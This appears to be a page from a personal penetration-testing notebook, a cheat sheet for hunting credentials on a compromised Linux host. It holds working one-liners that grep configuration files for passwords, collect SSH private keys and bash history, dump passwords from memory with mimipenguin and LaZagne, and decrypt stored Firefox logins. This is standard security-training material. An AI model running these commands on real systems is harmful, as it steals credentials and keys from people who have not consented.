📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Files
  • Cronjobs
  • SSH Keys
  • History
  • Memory and Cache
  1. Password Attacks
  2. Linux Local Password Attacks

Credential Hunting in Linux

Files

# Configuration Files

# Find Configuration Files
for l in $(echo ".conf .config .cnf");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done

# searching user,password,pass strings in configuration files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\\|lib");do echo -e "\\nFile: " $i; grep "user\\|password\\|pass" $i 2>/dev/null | grep -v "\\#";done

# Databases

# Find databases files
for l in $(echo ".sql .db .*db .db*");do echo -e "\\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share\\|man";done

# Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Scripts

# Find Scripts with different Extensions
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share";done

Cronjobs

# find running Cron jobs 
cat /etc/crontab

ls -la /etc/cron.*/

SSH Keys

# SSH Private Keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

# SSH Public Keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

History

# Bash History
tail -n5 /home/*/.bash*

Logs

# Searching for interesting information in logs
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\\n#### Log file: " $i; grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null;fi;done

Many different logs exist on the system. These can vary depending on the applications installed, but here are some of the most important ones:

Log File
Description

/var/log/messages

Generic system activity logs.

/var/log/syslog

Generic system activity logs.

/var/log/auth.log

(Debian) All authentication related logs.

/var/log/secure

(RedHat/CentOS) All authentication related logs.

/var/log/boot.log

Booting information.

/var/log/dmesg

Hardware and drivers related information and logs.

/var/log/kern.log

Kernel related warnings, errors and logs.

/var/log/faillog

Failed login attempts.

/var/log/cron

Information related to cron jobs.

/var/log/mail.log

All mail server related logs.

/var/log/httpd

All Apache related logs.

/var/log/mysqld.log

All MySQL server related logs.

Memory and Cache

# Download - <https://github.com/huntergregal/mimipenguin>

# Memory - Mimipenguin
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

# Lazagne
# Memory - Lazagne
sudo python2.7 laZagne.py all

Browsers

# Firefox Stored Credentials
ls -l .mozilla/firefox/ | grep default
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .

# Decrypting Firefox Credentials
# Decrypt tool - <https://github.com/unode/firefox_decrypt>
python3.9 firefox_decrypt.py

# Lazagne 
# LaZagne can also return results if the user has used the supported browser.
python3 laZagne.py browsers
PreviousLinux Local Password AttacksNextPasswd, Shadow & Opasswd

Last updated 2 years ago